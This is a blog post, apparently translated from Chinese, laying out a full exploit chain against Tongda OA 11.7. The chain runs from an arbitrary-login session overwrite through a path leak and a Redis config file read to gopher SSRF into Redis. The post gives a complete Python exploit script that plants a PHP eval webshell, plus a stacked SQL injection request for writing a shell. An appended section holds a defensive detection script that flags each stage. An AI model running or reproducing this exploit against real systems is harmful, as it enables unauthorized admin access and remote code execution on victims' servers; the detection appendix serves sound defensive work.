Tongda OA 11.7: A New Exploitation Approach (with EXP)

塔王 | 赛博回忆录 | 2022-11-05

Preface

Reheating some leftovers: this is nothing more than a handful of minor, low-value bugs chained together.

Arbitrary user login + obtain install directory + arbitrary file read + SSRF --> Redis --> write file --> getshell


1. Obtain the administrator's cookie via the arbitrary user login

2. Obtain the install directory and read the Redis configuration file

3. Write a file via SSRF

4. getshell


Obtaining the administrator's cookie via the arbitrary user login


The Tongda OA arbitrary user login only works while the administrator is online.

http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

Requesting this path overwrites the session; you can then log in directly with the returned cookie and browse to /general/ to reach the backend.

At this point the login has succeeded. Open an incognito window for this step.

If the response body is empty, it worked: use the current PHPSESSID to access the site.

If the response contains RELOGIN, the administrator is not online.

How the vulnerability arises

The code here checks whether the given UID is online. CLIENT defaults to 0, and 0 denotes a browser client.

This table stores the current user's login information: the UID and a timestamp. sid holds the PHPSESSID value, and client is the client identifier.


Obtaining the install directory and reading the Redis configuration file


/general/approve_center/archive/getTableStruc.php

This endpoint returns the log path (the logPath field of its JSON response), from which the install directory is derived. Next comes the arbitrary file read:

/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2


This reads out the Redis password (the requirepass line). Then, via SSRF:


/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/


The full EXP is as follows:

# -*- coding:utf-8 -*-
import os
import re
import sys
import requests
# author :
print("")
try:
    from urllib import quote_plus          # Python 2, which this script was written for
except ImportError:
    from urllib.parse import quote_plus    # Python 3


class GenerateUrl:
    # Builds the gopher:// body: a RESP command sequence that authenticates to Redis,
    # points dir/dbfilename at the web root, stores the webshell under key "1" and SAVEs it.
    def __init__(self, password, webroot, filename):
        self.password = password
        self.webroot = webroot
        self.filename = filename
        self.webshell = ''' <?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>

'''
        # One RESP token per line; newlines become %0D%0A in __str__.
        # "(unknown)" is the dbfilename placeholder token this script replaces below.
        self.template = '''_*2
$4
AUTH
${password_len}
{password}
*1
$8
flushall
*4
$6
CONFIG
$3
SET
$10
dbfilename
${filename_len}
(unknown)
*4
$6
CONFIG
$3
SET
$3
dir
${webroot_len}
{webroot}
*3
$3
SET
$1
1
${content_len}
{content}
*1
$4
save
*1
$4
quit

'''

    def __str__(self):
        webshell = self.webshell
        webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
        webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace('>', '%3e')
        self.template = self.template.replace("{password_len}", str(len(self.password)))
        self.template = self.template.replace("{password}", self.password)
        self.template = self.template.replace("{filename_len}", str(len(self.filename)))
        self.template = self.template.replace("(unknown)", self.filename)
        self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
        self.template = self.template.replace("{webroot}", self.webroot)
        self.template = self.template.replace("{content_len}", str(len(self.webshell)))
        self.template = self.template.replace("{content}", webshell)
        self.template = self.template.replace('\n', '%0D%0A')
        return quote_plus(self.template)


proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}


def headers(phpsesion):
    return {
        "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
        "Cookie": phpsesion,
    }


# Obtain the absolute install directory
def get_path(url, headers):
    urlc = url
    url = (url + '/general/approve_center/archive/getTableStruc.php')
    try:
        data = requests.get(url=url, headers=headers, proxies=proxies).json()
        path = data['logPath'].split('\\')[0]
        url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
        data2 = requests.get(url=url2, headers=headers, proxies=proxies)
        ress = re.search('requirepass .+', data2.text).group()
        return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
    except:
        exit('ERROR Cookie PHPSESSID expired')


# Write the file via SSRF
def ssrf_webshell(url, path, password):
    urlc = url
    path = path
    password = password
    a = GenerateUrl(password, path + "/webroot/", "666.php")
    url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
    data = requests.get(url=url, headers=headers, proxies=proxies)
    ddd = requests.get(url=urlc + '/666.php')
    if ddd.status_code == 200:
        print('shell url:%s' % urlc + '/666.php')
    else:
        print('send shell ERROR')
    return True


def get_cookie(url):
    url = url + "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
    }
    try:
        response = requests.get(url=url, headers=headers)
        if "RELOGIN" in response.text and response.status_code == 200:
            exit("目标用户为离线状态")
        elif response.status_code == 200 and response.text == "":
            print("好了马上就能getshell了")
            cookies = response.cookies
            cookie = requests.utils.dict_from_cookiejar(cookies)
            if cookie['SESSIONID']:
                return cookie['SESSIONID']
            else:
                exit('实在抱歉,getshell不了')
        else:
            print("未知错误,目标可能不存在或不存在该漏洞")
    except Exception as e:
        exit('实在抱歉,getshell不了')


if __name__ == '__main__':
    try:
        url = sys.argv[1]
        cookie = get_cookie(url)
        headers = headers(cookie)
        root_path = get_path(url, headers)
        ssrf_webshell(url, root_path['path'], root_path['redis_pass'])
    except:
        print('python tongda.py http://127.0.0.1')

The cookie-fetching part has not been tested; if something unexpected happens when you test it, adjust it. This is purely to demonstrate the idea.


Sharing an authenticated (backend) SQL injection point


Stacked queries are supported here. You first need the Tongda OA install directory, then write a shell out with an into clause and you are done. =。=

POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
Host: 10.211.55.5
Content-Length: 39
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.211.55.5
Referer: http://10.211.55.5/general/officeProduct/product_apply/index.php
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5; SID_1=24205621
Connection: close

arr[5][pro_id]=151';select sleep(3) %23
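An added detection example, not part of the original article or the Tongda OA code base: the chain above is four requests from one client, and the injection point adds a fifth, so the script below flags each stage by path and decoded parameters and then correlates hits per source IP. The request records are constructed and assume a reverse proxy or WAF that also logs POST bodies; the rule names and the three-stage threshold are my own choices.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed request records (source IP, method, path+query, POST body), as a
# reverse proxy or WAF with body logging would emit. Not taken from the article.
REQUESTS = [
    ("10.0.0.5", "GET", "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0", ""),
    ("10.0.0.5", "GET", "/general/approve_center/archive/getTableStruc.php", ""),
    ("10.0.0.5", "GET", "/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2", ""),
    ("10.0.0.5", "GET", "/pda/workflow/img_download.php?PLATFORM=dd"
                        "&ATTACHMENTS=gopher%3A%2F%2F127.0.0.1%3A6399%2F_", ""),
    ("10.0.0.9", "GET", "/ispirit/im/photo.php?AVATAR_FILE=avatar_2.jpg&UID=2", ""),
    ("10.0.0.9", "POST", "/general/appbuilder/web/officeproduct/productapply/applyprobygroup",
                         "arr%5B5%5D%5Bpro_id%5D=151%27%3Bselect+sleep%283%29+%23"),
    ("10.0.0.9", "POST", "/general/appbuilder/web/officeproduct/productapply/applyprobygroup",
                         "arr%5B5%5D%5Bpro_id%5D=151"),
]

# (rule name, regex on the path, regex on the URL-decoded query string and body;
#  None means any request to that path is worth flagging)
RULES = [
    ("auth_mobi session overwrite", r"/mobile/auth_mobi\.php$", r"isAvatar=1.*\buid=\d+"),
    ("getTableStruc install-path leak", r"/approve_center/archive/getTableStruc\.php$", None),
    ("photo.php absolute-path file read", r"/ispirit/im/photo\.php$",
     r"AVATAR_FILE=(?:[A-Za-z]:[/\\]|/|\.\.)"),
    ("img_download gopher SSRF", r"/pda/workflow/img_download\.php$",
     r"ATTACHMENTS=(?:gopher|dict|file|ftp)://"),
    ("productapply stacked SQL injection", r"/productapply/applyprobygroup$",
     r"pro_id\]=[^&]*'[^&]*;\s*(?:select|insert|update|delete)\b"),
]


def classify(record):
    """Return the names of every rule a single request record matches."""
    _src, _method, url, body = record
    parts = urlsplit(url)
    params = unquote_plus(parts.query) + "\n" + unquote_plus(body)   # decode once
    return [name for name, path_re, param_re in RULES
            if re.search(path_re, parts.path)
            and (param_re is None or re.search(param_re, params, re.I))]


def chains(records, min_stages=3):
    """Correlate hits per source: a single stage is noisy, but one client walking
    several stages of the chain is the pattern the article describes."""
    per_src = {}
    for rec in records:
        for hit in classify(rec):
            per_src.setdefault(rec[0], set()).add(hit)
    return {src: sorted(hits) for src, hits in per_src.items() if len(hits) >= min_stages}
```

With the constructed records, chains(REQUESTS) reports only 10.0.0.5, which walked all four stages of the chain; 10.0.0.9's single injection attempt still surfaces through classify().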


